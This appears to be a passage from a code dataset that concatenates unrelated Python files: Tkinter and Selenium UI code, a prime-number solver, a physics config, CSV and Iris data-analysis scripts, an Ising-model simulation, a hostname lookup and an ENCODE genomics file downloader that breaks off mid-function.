app.run_server()","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"126100708","text":"from tkinter import *\nfrom PIL import ImageTk,Image\nroot=Tk()\nroot.title("Learn to code")\nroot.iconbitmap('f:iron.ico')\n#r=IntVar()\n#r.set(2)\nmodes=[\n\n    ("pepperoni","pepperoni"),\n    ("cheese","cheese"),\n    ("mushroom","mushroom"),\n    ("mix","mix"),\n    ("double","double")\n\n]\npizza=StringVar()\npizza.set("pepperoni")\n\ndef clicked(value):\n    l=Label(root,text=value).pack()\n\nfor text,mode in modes:\n    Radiobutton(root,text=text,variable=pizza,value=mode).pack(anchor=W)\n\n#Radiobutton(root,text="Option1",variable=r,value=1).pack()\n#Radiobutton(root,text="Option2",variable=r,value=2).pack()\n#Radiobutton(root,text="Option3",variable=r,value=3).pack()\n\nl=Label(root,text=pizza.get()).pack()\n\n\nb=Button(root,text="Click me",command=lambda: clicked(pizza.get())).pack()\nroot.mainloop()","sub_path":"tkinter7.py","file_name":"tkinter7.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"233982600","text":"from __future__ import print_function, division\nfrom selenium import webdriver\nfrom 
selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import TimeoutException\nimport time\nfrom base.seleniumdriver import SeleniumDriver\nimport utilities.custom_logger as cl\nimport logging\nfrom pages.cloud.cloud_page import CloudPage\nfrom utilities.tstatus import TStatus\n\n\nclass DataCenterPage(SeleniumDriver):\n    log = cl.customLogger(logging.DEBUG)\n\n    def __init__(self, driver):\n        SeleniumDriver.__init__(self, driver)\n        self.driver = driver\n        self.tst = TStatus(self.driver)\n\n# Creating locators for the data center page\n\n    __data_center_tab = "nav-list-item-DATA_CENTERS"\n    __data_center_table = "//*[@id='zscm']/div/div[2]/div/div[2]/div[1]/div/div[2]"\n    _cloud_icon = "nav-list-item-CLOUD"\n    _addNewDataCenter = "//*[@id='zscm']/div/div[2]/div/div[1]/div[1]/div/span"\n    _nameInput = "form-component-input-name"\n    _providerInput = "form-component-input-provider"\n    _countryDropDown = "form-component-dropDown-country"\n    _countryDropDownOption1 = "#form-component-dropDown-country > div.drop-down-list-container.allow-search > ul > li:nth-child(1)"\n    _cityInput = "form-component-input-city"\n    _latitude = "form-component-inputWithRadioButtons-latitudeAbs"\n    _saveButton = "//*[@id='zscm']/div/div[2]/div/div[3]/span/div/div[3]/span[1]"\n    _remove_datacenter_icon = "//*[contains(text(), 'OliaOlia')]/following-sibling::div/span[@title='Remove']"\n    _edit_datacenter_button = "//*[contains(text(), 'OliaOlia')]/following-sibling::div/span[@title='Edit']"\n    _disabled_save_button = "//*[@id='zscm']/div/div[2]/div/div[3]/span/div/div[3]/span[1]"\n    _cancel_button = "//*[@id='zscm']/div/div[2]/div/div[3]/span/div/div[3]/span[2]"\n    _remove_edited_datacenter_icon = "//*[contains(text(), 'NewOliaOliaOliaOlia')]/following-sibling::div/span[@title='Remove']"\n    _check = "//*[contains(text(), 'OliaOlia12')]/following-sibling::div/span[@title='Remove']"\n\n\n# Methods to be used for test scenarios\n\n    def dataCenterTable(self, locator):\n        self.locator = "//*[@id='zscm']/div/div[2]/div/div[2]/div[1]/div/div" + str(locator)\n        return self.locator\n\n    def clickDataCenterTab(self):\n        self.waitForElement(self._cloud_icon)\n        self.verifyElements(self._cloud_icon)\n        self.elementClick(self._cloud_icon)\n        self.waitForElement(self.__data_center_tab)\n        self.verifyElements(self.__data_center_tab)\n        self.elementClick(self.__data_center_tab)\n\n    def loopThroughTables(self, text, locator):\n        # self.getElementText(text, self.__data_center_table, locatorType="css")\n        result = self.getElement(self.dataCenterTable(locator), locatorType="xpath").text\n        if result == text:\n            result = True\n            self.tst.markFinal("test_DATA_CENTER_Tables", result, "All tables are displaying correctly")\n        else:\n            result = False\n            self.tst.markFinal("test_DATA_CENTER_Tables", result, "All tables are NOT displaying correctly")\n\n    def clickAddNewDataCenter(self):\n        self.elementClick(self._addNewDataCenter, locatorType="xpath")\n\n    def sendDataDataCenter(self, name, city, provider, latitude):\n        self.waitForElement(self._nameInput)\n        self.verifyElements(self._nameInput)\n        self.sendKeys(name, self._nameInput)\n        self.waitForElement(self._cityInput)\n        self.verifyElements(self._cityInput)\n        self.sendKeys(city, self._cityInput)\n        self.sendKeys(provider, self._providerInput)\n        self.sendKeys(latitude, self._latitude)\n\n    def clickSaveButton(self):\n        self.elementClick(self._saveButton, 
locatorType="xpath")\n\n    def chooseCountry(self):\n        self.elementClick(self._countryDropDown)\n        time.sleep(3)\n        self.elementClick(self._countryDropDownOption1, locatorType="css")\n\n    def clickRemoveIcon(self):\n        self.elementClick(self._remove_datacenter_icon, locatorType="xpath")\n\n    def clickEditIcon(self):\n        self.elementClick(self._edit_datacenter_button, locatorType="xpath")\n\n    def preconditionData1(self):\n        result = self.isElementPresent(self._remove_datacenter_icon, locatorType="xpath")\n        return result\n\n    def preconditionData2(self):\n        result = self.isElementPresent(self._edit_datacenter_button, locatorType="xpath")\n        return result\n\n    def preconditionData3(self):\n        result = self.isElementPresent(self._check, locatorType="xpath")\n        return result\n\n    def removeEditedbutton(self):\n        return self.waitForElement(self._remove_edited_datacenter_icon, locatorType="xpath")\n\n    def clickCancel(self):\n        self.elementClick(self._cancel_button, locatorType="xpath")\n\n    def clickRemoveIcon2(self):\n        self.elementClick(self._remove_edited_datacenter_icon, locatorType="xpath")\n\n\n    def preconditionCheck1(self):\n        if self.preconditionData1() == True:\n            self.log.info("Data Center exists")\n            self.deleteDataCenter()\n            time.sleep(2)\n            self.log.info("Successfully deleted Data Center")\n        else:\n            self.log.info("Pre-condition: no data center exists")\n\n    def preconditionCheck2(self):\n        if self.preconditionData2() == True:\n            self.log.info("Data center exists and is ready to be edited")\n        else:\n            self.log.info("No data center found for editing")\n            self.createDataCenter(name="OliaOlia", city="san Jose", provider="Automation", latitude="2")\n\n    # Verification methods\n\n    def verifyUnableCreateEmptyDataCenter(self):\n        result = self.isElementPresent(self._disabled_save_button, locatorType="xpath")\n        if result == True:\n            self.tst.markFinal("verifyUnableCreateEmptyDataCenter", result, "Success! UNABLE to create an empty DataCenter")\n        else:\n            self.tst.markFinal("verifyUnableCreateEmptyDataCenter", result, "FAILED: WAS ABLE to create an empty DataCenter")\n\n    def verifyHardwareCreated(self):\n        result = self.isElementPresent(self._remove_datacenter_icon, locatorType="xpath")\n        if result == True:\n            self.tst.markFinal("verifyDataCenterCreated", result, "Success! DataCenter was created")\n        else:\n            self.tst.markFinal("verifyDataCenterCreated", result, "FAILED: DataCenter was not created")\n\n\n    def verifyHardwareNotCreated(self):\n        result = self.isElementPresentFake(self._remove_datacenter_icon, locatorType="xpath")\n        if result == True:\n            self.tst.markFinal("verifyDataCenterCreated", result, "Success! Empty DataCenter was not created")\n        else:\n            self.tst.markFinal("verifyDataCenterCreated", result, "FAILED: Empty DataCenter was created")\n\n    def verifyDataCenterEdited(self):\n        result = self.isElementPresent(self._remove_edited_datacenter_icon, locatorType="xpath")\n        if result == True:\n            self.tst.markFinal("verifyDataCenterCreated", result, "Success! 
DataCenter was edited")\n        else:\n            self.tst.markFinal("verifyDataCenterCreated", result, "FAILED: DataCenter was not edited")\n\n    # Scenarios\n\n    def createDataCenter(self, name="", city="", provider="", latitude=""):\n        self.log.info("Checking if Data Center with the same name already exists")\n        self.preconditionCheck1()\n        self.log.info("Creating new data center")\n        self.clickAddNewDataCenter()\n        time.sleep(3)\n        self.sendDataDataCenter(name, city, provider, latitude)\n        time.sleep(3)\n        self.chooseCountry()\n        time.sleep(5)\n        self.clickSaveButton()\n        time.sleep(5)\n        self.verifyHardwareCreated()\n\n    def deleteDataCenter(self):\n        self.log.info("Deleting data center")\n        self.clickRemoveIcon()\n        time.sleep(2)\n        self.clickSaveButton()\n        time.sleep(2)\n\n    def deleteEditedDataCenter(self):\n        self.log.info("Deleting data center")\n        self.clickRemoveIcon2()\n        time.sleep(2)\n        self.clickSaveButton()\n        time.sleep(2)\n\n    def createEmptyDataCenter(self):\n        self.log.info("Creating empty data center")\n        self.clickAddNewDataCenter()\n        self.clickSaveButton()\n        self.verifyUnableCreateEmptyDataCenter()\n        self.log.info("Clicking cancel button")\n        self.clickCancel()\n\n\n    def editDataCenter(self):\n        self.preconditionCheck2()\n        self.clickEditIcon()\n        self.log.info("Editing data center")\n        self.sendDataDataCenter("NewOliaOlia", "San jose", "Automation", "1")\n        self.clickSaveButton()\n        time.sleep(3)\n        self.verifyDataCenterEdited()\n","sub_path":"pages/datacenter/datacenter_page.py","file_name":"datacenter_page.py","file_ext":"py","file_size_in_byte":8747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"63252911","text":"# -*- coding: utf-8 -*-\r\n"""\r\nCreated on Tue Jul 10\r\n\r\n@author: Ancient Abysswalker\r\n"""\r\n\r\ndef checkPrime(number,Primes):\r\n    for Prime in Primes:\r\n        if number%Prime == 0:\r\n            return False\r\n    return True\r\n\r\n#I'm just going to cheat a little here :3\r\nimport urllib.request\r\nsock = urllib.request.urlopen('http://primos.mat.br/primeiros_10000_primos.txt')\r\nhtmlSource = sock.read()\r\nsock.close()\r\n\r\nprimes=[]\r\nfor each in htmlSource.split():\r\n\tprimes.append(int(each))\r\n\t\r\n#Move up from 10000th prime to find next prime\r\ncurrentValue=primes[-1]\r\nwhile True:\r\n\tif checkPrime(currentValue,primes):\r\n\t\tbreak\r\n\telse:\r\n\t\tcurrentValue+=1\r\nprint(currentValue)","sub_path":"Euler Projekt 007 - 10001st Prime/EulerProjekt_7.py","file_name":"EulerProjekt_7.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"473851281","text":"import FWCore.ParameterSet.Config as cms\nADSmd0pimkpimdcs = cms.EDAnalyzer("DataCardFileWriter",\n\tFileName = cms.string("ADSmd0pimkpimdcs.dec"),\n\tFileContent = cms.vstring()\n\t)\nADSmd0pimkpimdcs.FileContent.extend([\n\t"#",\n\t"#",\n\t"# O. 
Long / UCSB",\n\t"#",\n\t"# $Id: ADS-d0pi-kpi-dcs.dec,v 1.1 2004/05/17 22:51:40 owen Exp $",\n\t"#",\n\t"#",\n\t"Alias MyB+ B+",\n\t"Alias MyB- B-",\n\t"Alias MyD0 D0",\n\t"Alias Myanti-D0 anti-D0",\n\t"#",\n\t"Decay Upsilon(4S)",\n\t"0.5 MyB+ B- VSS;",\n\t"0.5 MyB- B+ VSS;",\n\t"Enddecay",\n\t"#",\n\t"#",\n\t"Decay MyB-",\n\t"1.0 pi- MyD0 PHSP;",\n\t"Enddecay",\n\t"#",\n\t"Decay MyB+",\n\t"1.0 pi+ Myanti-D0 PHSP;",\n\t"Enddecay",\n\t"#",\n\t"Decay MyD0",\n\t"1.0 K+ pi- PHSP;",\n\t"Enddecay",\n\t"#",\n\t"Decay Myanti-D0",\n\t"1.0 K- pi+ PHSP;",\n\t"Enddecay",\n\t"#",\n\t"#",\n\t"End"\n\t])\n","sub_path":"python/ADSmd0pimkpimdcs.py","file_name":"ADSmd0pimkpimdcs.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"90839287","text":"from ControleSapSku.Consultas.gambis import relatorioGeral\nfrom manipulateSheet.OpenCsv import OpenCsv\n\ndef modelo(sku, value):\n    return f'{sku}-{(4 - len(str(value))) * "0" + str(value)}'\n\narraySheet = OpenCsv('/home/bertho/Documents/Aut/enviar_lucas').csvToDic()\ncc = 0\nusados = []\n# att = open('/home/bertho/Documents/Aut/relatorio/att_imgs.csv', 'w', encoding='utf-8')\n# att.write('"sku","thumbnail_image","additional_images"\\n')\nhh = open(f'/home/bertho/Documents/Aut/relatorio/atr_set_sku/geral.csv', 'w', encoding='utf-8')\nheader = '"sku","altura","comprimento","largura"'\nhh.write(f'{header}\\n')\nhh.close()\n\ngeral = relatorioGeral()\nDicCalda = {}\nfor obj in geral:\n    DicCalda[obj.sku] = obj.value\n\nfor sheet in arraySheet:\n\n    # exit(sheet.getSheetName())\n    for linha in sheet.gerArrayDic():\n        # exit(linha)\n        if linha == '':\n            continue\n        if linha["sku"].split("-")[0] not in usados:\n            sku = linha["sku"].split('-')[0]\n            try:\n                DicCalda[sku]\n            except:\n                print(sku)\n                continue\n            for caldas in range(1, DicCalda[sku] + 1):\n                newSku = modelo(sku, caldas)\n                with open(f'/home/bertho/Documents/Aut/relatorio/atr_set_sku/geral.csv', 'a+', encoding='utf-8') as w:\n                    # text = f'"{linha["sap"]}","{linha["sku"].split("-")[0]}","{linha["attribute_set_code"]}"'\n                    try:\n                        altura = str(linha["volume_altura"]).split('.')[0]\n                    except:\n                        altura = linha["volume_altura"]\n\n                    try:\n                        comprimento = str(linha["volume_comprimento"]).split('.')[0]\n                    except:\n                        comprimento = linha["volume_comprimento"]\n\n                    try:\n                        largura = str(linha["volume_largura"]).split('.')[0]\n                    except:\n                        largura = linha["volume_largura"]\n\n                    # print(altura + '|' + comprimento + '|' + largura)\n                    text = f'"{newSku}","{altura}","{comprimento}","{largura}"'\n                    w.write(text + '\\n')\n                    cc += 1\n            usados.append(sku)\n\nprint(f"Lines created: {cc}")\n","sub_path":"AtualizarAtributos/relatorios.py","file_name":"relatorios.py","file_ext":"py","file_size_in_byte":2280,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"79503435","text":""""\nThis module contains unit tests of reorganize_performance_results().\n"""\n\nfrom data_types import SingleRunPerformanceResult, MultiRunPerformanceResult\nfrom multi_run_in_parallel import MultiRunInParallel\n\n\nSINGLE_RESULT_1 = SingleRunPerformanceResult(\n    order_spreading=[0.2, 0.5, 0.7, 0.9, None],\n    normal_peer_satisfaction=[0.6, 0.8, 0.5, 1.0],\n    free_rider_satisfaction=[0.2, 0.3],\n    fairness=None,\n)\n\nSINGLE_RESULT_2 = SingleRunPerformanceResult(\n    order_spreading=[0.3, 0.6, 0.8, None, 1],\n    
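# free_rider_satisfaction is None below: the metric was not collected for this run,\n    # and reorganize_performance_results() is expected to drop it (see EXPECTED_RESULT)\n    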
normal_peer_satisfaction=[0.8, 0.9, 0.6],\n    free_rider_satisfaction=None,\n    fairness=None,\n)\n\nSINGLE_RESULT_3 = SingleRunPerformanceResult(\n    order_spreading=[0.2, 1.0, 1.0, 1.0, 1.0],\n    normal_peer_satisfaction=None,\n    free_rider_satisfaction=[0.2, 0.3],\n    fairness=None,\n)\n\nSINGLE_RESULT_LIST = [SINGLE_RESULT_1, SINGLE_RESULT_2, SINGLE_RESULT_3]\n\nEXPECTED_RESULT = MultiRunPerformanceResult(\n    order_spreading=[\n        [0.2, 0.5, 0.7, 0.9, None],\n        [0.3, 0.6, 0.8, None, 1],\n        [0.2, 1.0, 1.0, 1.0, 1.0],\n    ],\n    normal_peer_satisfaction=[[0.6, 0.8, 0.5, 1.0], [0.8, 0.9, 0.6]],\n    free_rider_satisfaction=[[0.2, 0.3], [0.2, 0.3]],\n    fairness=[],\n)\n\n\ndef test_reorganize_performance_results():\n    """\n    This tests reorganize_performance_result() in multi_run_in_parallel.py\n    """\n    real_result = MultiRunInParallel.reorganize_performance_results(SINGLE_RESULT_LIST)\n    assert real_result == EXPECTED_RESULT\n","sub_path":"test/single_and_multi_run/test_reorganize_performance_results.py","file_name":"test_reorganize_performance_results.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"440874139","text":"import pandas as pd\r\nimport matplotlib.pyplot as plt\r\nimport plotly.express as px\r\nimport numpy as np\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.model_selection import train_test_split\r\nimport mysql.connector\r\n\r\nmydb = mysql.connector.connect(\r\n    host="localhost",\r\n    user="root",\r\n    passwd="123456"\r\n)\r\n\r\n#print(mydb)\r\n\r\n#Load Data: The Iris dataset was used in R.A. Fisher's classic 1936 paper, The Use of Multiple Measurements in Taxonomic Problems, and can also be found on the UCI Machine Learning Repository.\r\n\r\n\r\nimport pymysql\r\n\r\nconnection = pymysql.connect(host='localhost',\r\n                             user='root',\r\n                             password='123456',\r\n                             db='iris')\r\n\r\n\r\ncursor=connection.cursor()\r\n\r\ncursor.execute('SELECT * FROM iris.iris')\r\n\r\nfor row in cursor:\r\n    print(row)\r\n\r\n\r\n#Data Exploration:\r\nsql01 = cursor.execute('SELECT AVG(SepalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n    print(row)\r\n\r\nsql02 = cursor.execute('SELECT Sum(SepalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n    print(row)\r\n\r\nsql03 = cursor.execute('SELECT AVG(PetalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n    print(row)\r\n\r\nsql04 = cursor.execute('SELECT Sum(PetalLengthCm) FROM iris.iris')\r\nfor row in cursor:\r\n    print(row)\r\n\r\n\r\n#Data Wrangling:\r\ndf = pd.read_csv('https://raw.githubusercontent.com/Zchen116/Data602/master/Iris.csv')\r\n\r\ndf = df.drop('Id', axis=1)\r\n\r\ndf.rename(columns = {'SepalWidthCm':'sepal_width', 'SepalLengthCm':'sepal_length', 'Species':'SPECIES'}, inplace = True)\r\n\r\nprint (df)\r\n\r\n#Data Visualizations:\r\n\r\ndf.plot(kind='box', subplots=True, layout=(2,2), sharex=False, sharey=False)\r\n\r\nplt.show()\r\n\r\n#\r\n\r\ndf.hist()\r\n\r\nplt.show()\r\n\r\n#From the graph, we can see two of the input variables have a normal distribution\r\n\r\n\r\nfig = px.scatter(df, x="PetalLengthCm", y="PetalWidthCm", color="SPECIES")\r\n\r\nfig.show()\r\n\r\n#Conclusion: we can see Blue points (Iris-setosa) can be easily separated from red (Iris-versicolor) and green (Iris-virginica) by using PetalLength and PetalWidth.\r\n\r\nfig = px.scatter(df, x="sepal_width", y="sepal_length", color="SPECIES")\r\n\r\nfig.show()\r\n\r\n#Conclusion: the species: Iris-setosa is not really related to the other two 
across all feature combinations.\r\n\r\n#Prediction\r\narray = df.values\r\n\r\nX = array[:,0:4]\r\n\r\ny = array[:,4]\r\n\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.4, stratify = y)\r\n\r\nknn = KNeighborsClassifier(n_neighbors = 6)\r\n\r\nknn.fit(X_train, y_train)\r\n\r\nprint(knn.score(X_test, y_test))\r\n\r\n#The accuracy is 0.96 or 96%.\r\n\r\n\r\n","sub_path":"assignment 8.py","file_name":"assignment 8.py","file_ext":"py","file_size_in_byte":2595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"91103279","text":"from rest_framework import serializers\nfrom django.utils.translation import ugettext_lazy as _\nfrom samiBackend import CONSTANTES\nfrom samiBackend import models\nfrom samiBackend.notificaciones import notificaciones\n\nclass ConfirmarSerializer(serializers.Serializer):\n    '''\n    Serializer used to confirm a notification.\n    '''\n\n    numeroPk = serializers.IntegerField(required=True, label=_("Number Id"),\n        help_text=_("Identifier of the number associated with the notification"))\n\n    tipo = serializers.ChoiceField(required=True,\n        label=_("Notification Type"),\n        help_text=_("Type of notification being confirmed"),\n        choices=sorted(notificaciones.TIPO_NOTIFICACIONES.itervalues())\n    )\n\n\nclass EnviarNotificacionSerializer(serializers.Serializer):\n    '''\n    Serializer to test the sending of notifications\n    '''\n\n    userPk = serializers.IntegerField(required=False, label=_("User Id"),\n        help_text=_("User identifier; if null, the authenticated user is used."))\n\n    tipoDispositivo = serializers.ChoiceField(required=True,\n        label=_("Device Type"),\n        help_text=_("Type of device"),\n        choices=CONSTANTES.TIPO_DISPOSITIVOS.items()\n    )\n\n    idDispositivo = serializers.CharField(required=True,\n        label=_("Device Id"),\n        help_text=_("Device identifier")\n    )\n\n    tipoNotificacion = serializers.ChoiceField(required=True,\n        label=_("Notification Type"),\n        help_text=_("Type of notification being confirmed"),\n        choices=sorted(notificaciones.TIPO_NOTIFICACIONES.itervalues())\n    )\n\n    numeroPk = serializers.IntegerField(required=True, label=_("Number Id"),\n        help_text=_("Identifier of the number associated with the notification"))\n\n    eventoPk = serializers.IntegerField(required=True, label=_("Event Id"),\n        help_text=_("Identifier of the event associated with the number"))\n","sub_path":"SAMI/samiServicios/serializers/notificaciones.py","file_name":"notificaciones.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"509014746","text":"#!/usr/bin/env python3\n\n# https://codeforces.com/problemset/problem/1038/B\n# The sample outputs of constructive problems are often misleading!!\n# When the answer is not unique, do not try to reproduce the sample output; the setter is not showing the way\n# The total sum is n*(n+1)/2; depending on the parity of n, set s1 to [1, n-1] or [1, n]\n\ndef f(n):\n    if n<3:\n        return ['No']\n    l = ['Yes']\n    l.append('2 1 %d'%(n if n%2==0 else n-1))\n    s2 = [n-2] + list(range(2,n-1)) + [n if n%2==1 else n-1]\n    l.append(' '.join(map(str,s2)))\n    return l\n\nn = int(input())\n[print(r) for r in f(n)]\n","sub_path":"codeforces/constructive构建算法/1100/1038B非互质分割.py","file_name":"1038B非互质分割.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"196374818","text":"#!/usr/bin/env python3\r\nimport socket\r\nimport argparse\r\n\r\ndef get_ip(hostname):\r\n    """ Gets the IP address given a hostname.\r\n\r\n    :param hostname: 
hostname\r\n    :return: the ip of the host\r\n    """\r\n    try:\r\n        return socket.gethostbyname(hostname)\r\n    except:\r\n        return "None"\r\n\r\nif __name__ == '__main__':\r\n    parser = argparse.ArgumentParser()\r\n    parser.add_argument('hostname', help='hostname to get the ip from')\r\n    hostname = vars(parser.parse_args())['hostname']\r\n    address = get_ip(hostname)\r\n    print("The IP address of {} is {}".format(hostname, address))\r\n","sub_path":"get_ip.py","file_name":"get_ip.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"180388610","text":"# This program calculates how many points downloading a resource from Liudu (6-Dimensional Space) will cost\n# XiaZaiXiaoHao (download cost)\nimport math\ndef JiFen(XiaZai):\n\tif math.log(XiaZai+1)/math.log(2) >33:\n\t\tbianliang1 = 33\n\telse:\n\t\tbianliang1 = math.log(XiaZai+1)/math.log(2)\n\tJiFenXiaZai = XiaZai/(34-bianliang1)\n\t#print(JiFenXiaZai)\n\treturn JiFenXiaZai\n\n# ----- Enter the amount already downloaded and the amount still to download below, in GB -----\nYiDownload = 30.4  # in GB\nWillDownload = 10  # in GB\n# ----- Do not modify anything below -----\n\n\nprint('Downloaded', YiDownload, 'GB; points spent so far:', '{:.2f}'.format(JiFen(YiDownload * 1024)))\nWillSpent = JiFen((YiDownload+WillDownload) * 1024) - JiFen(YiDownload * 1024)\nprint('Downloading another', WillDownload, 'GB will cost:', '{:.2f}'.format(WillSpent))\n","sub_path":"SixWeiJiFen.py","file_name":"SixWeiJiFen.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"188147543","text":"# This program calculates the total energy and magnetization\n# for a 2D Ising model with num_dipoles x num_dipoles dipoles\n# Author: Nico Grisouard, University of Toronto\n# Date: 20 November 2018\n\n# import modules\nfrom numpy import *\nfrom matplotlib.pyplot import *\nfrom random import *\n\n\ndef energyfunction(dipoles):\n    """\n    function to calculate the energy of the lattice\n    :param dipoles: a nxn lattice with dipoles\n    :type dipoles: array\n    :return: float of energy\n    :rtype: float\n    """\n    tmp = dipoles.copy()\n    horizontal = tmp[:, 0: -1] * tmp[:, 1:]\n    vertical = tmp[0: -1] * tmp[1:]\n    energy = sum(horizontal) + sum(vertical)\n    return -energy\n\n\ndef acceptance(En, Eo, kT):\n    """ Function for acceptance probability\n    IN:\n    En [float] the new energy\n    Eo [float] the old energy\n    kT [float] kB*T\n    OUT: accepted [bool]\n    """\n    p = exp(-(En - Eo)/kT)  # Boltzmann factor\n    if En-Eo <= 0 or random() < p:\n        accepted = True\n    else:  # rejected\n        accepted = False\n    return accepted\n\n\ndef M(dipoles): return sum(dipoles)  # total magnetization\n\n\n# define constants\nkB = 1.0\nT = 1.0\nJ = 1.0\nnum_dipoles = 20  # number of dipoles per row\nN = 1000000  # number of flips\n\n# generate array of dipoles\ndipoles = zeros([num_dipoles, num_dipoles], int)\n\nfor i in range(num_dipoles):\n    for j in range(num_dipoles):\n        if random() < 0.5:\n            dipoles[i, j] = 1\n        else:\n            dipoles[i, j] = -1\n\nenergy = []\nmagnet = []\n\nE = J * energyfunction(dipoles)\nenergy.append(E)\nmagnet.append(M(dipoles))\n\nj = 0  # counter for animation\nanimation_interval = 5000  # plot after every interval\n\nfor i in range(N):\n    m = randrange(num_dipoles)\n    n = randrange(num_dipoles)\n    dipoles[m, n] *= -1  # We flip\n    Enew = J * energyfunction(dipoles)\n\n    # calculate new energy depending on probability\n    flipd = acceptance(Enew, E, kB*T)  # this is the next old value\n    if flipd:\n        E = Enew\n    else:\n        dipoles[m, n] *= -1  # we de-flip\n\n    # animation\n    if j > animation_interval:\n        clf()\n        figure(1)\n        title('orientation of dipoles when T 
= {0}'.format(T))\n        imshow(dipoles)\n        draw()\n        pause(0.01)\n        j = 0\n\n    # store energy and magnetization\n    energy.append(E)\n    magnet.append(M(dipoles))\n\n    j += 1\n\n# plot energy, magnetization\nfigure()\n\nsubplot(211)\nplot(energy)\ngrid()\nxlabel("Number of flips")\nylabel("Total energy")\n\nsubplot(212)\nplot(magnet)\ngrid()\nxlabel("Number of flips")\nylabel("Total magnetization")\n\ntight_layout()\n# savefig('2D_Ising T = {0}.png'.format(T))\nshow()\n\n# d)\n# As we do a million Monte Carlo flips, the magnetic dipoles tend to stabilize, generally after about 100,000 flips,\n# with only small variation in orientation: they end up either all positively oriented or all negatively oriented.\n# Macroscopically, the magnet then exhibits only one magnetic state, positive or negative,\n# with maximum or minimum energy.\n\n# e)\n# When T=1.0, we can see from the animation that the dipoles tend to become all positive or all negative, with small\n# variation in the magnetization graph. However, when we increase the temperature, it is harder for the dipoles to\n# stabilize; there is large variation in the total magnetization of the magnet.\n","sub_path":"phy407 Computational Physics/Lab11/Q2.py","file_name":"Q2.py","file_ext":"py","file_size_in_byte":3219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"463872500","text":""""\nModule to download the experiment files and validate them\n"""\n\nimport requests\nimport subprocess\nimport os\nimport sys\nimport json\nimport boto\nimport csv\nimport pandas as pd\nfrom urllib.parse import (\n    urlencode,\n    urlparse,\n)\nfrom pandas.util.testing import assert_frame_equal\n\n# Have to remove these\nAUTHID = 'id'\nAUTHPW = 'pwd'\n\nSERVER = 'https://www.encodeproject.org'\nS3_BUCKET = 'encode-files'\nHEADERS = {'content-type': 'application/json'}\nEPILOG = __doc__\n_PARAMS = {\n    'format': ['json'],\n    'field': [\n        'accession',\n        'files.accession',\n        'files.file_format',\n        'files.paired_end',\n        'files.paired_with',\n        'files.href',\n        'files.replicate.biological_replicate_number',\n        'files.replicate.technical_replicate_number'\n    ],\n    'limit': ['all'],\n    'files.file_format': ['bam']\n}\n\n\ndef get_file(href):\n    r = requests.get(SERVER + href, headers=HEADERS, allow_redirects=True,\n                     stream=True)\n    try:\n        r.raise_for_status()\n    except:\n        print('%s href does not resolve' % (href))\n        sys.exit()\n\n    s3_url = r.url\n    r.close()\n    o = urlparse(s3_url)\n    filename = os.path.basename(o.path)\n\n    #boto.set_stream_logger('boto')\n    s3 = boto.connect_s3()\n    encode_bucket = s3.get_bucket('encode-files')\n    key = encode_bucket.get_key(o.path)\n    try:\n        key.get_contents_to_filename(filename)\n    except:\n        response = requests.get(SERVER + href, auth=(AUTHID, AUTHPW),\n                                allow_redirects=True)\n        if response.status_code == 200:\n            with open(filename, 'wb') as f:\n                f.write(response.content)\n        else:\n            return None\n    return filename\n\n\ndef validate_data(experiment):\n    """\n    Calculates hash for each bam file and also for fastq files.\n    Takes paired-endedness into consideration.\n    """\n    checksum = {\n        'bam': {},\n        'fastq': {}\n    }\n    for f in experiment['files']:\n        # Skipping files other than bam and fastq\n        if f['file_format'] not in ['fastq', 'bam']:\n            continue\n\n        # Avoid downloading paired_ended files twice\n        if 'paired_end' in f and f['paired_end'] == '2':\n            continue\n\n        file_names = [get_file(f['href'])]\n        if 'replicate' in f:\n            biological_rep = str(f['replicate']['biological_replicate_number'])\n            technical_rep = 
str(f['replicate']['technical_replicate_number'])\n        else:\n            checksum['notification'] = 'No replicate information'\n            return checksum\n\n        if f['file_format'] == 'bam':\n            print("Calculating checksum for - " + file_names[0])\n            try:\n                checksum_bam = subprocess.check_output([\n                    './BamHash/bamhash_checksum_bam', file_names[0]])\n            except subprocess.CalledProcessError as e:\n                checksum['notification'] = 'Process error'\n                return checksum\n            if f['replicate']['biological_replicate_number'] not in \\\n                    checksum['bam']:\n                checksum['bam'][biological_rep] = {}\n            checksum['bam'][biological_rep][technical_rep] = checksum_bam\n        elif f['file_format'] == 'fastq':\n            if 'paired_with' in f:\n                paired_file = get_file(f['paired_with'] +\n                                       '@@download/' +\n                                       f['paired_with'][7:-1] + '.fastq.gz')\n                print('Calculating checksum for - ' + file_names[0] + ' and ' + paired_file)\n                try:\n                    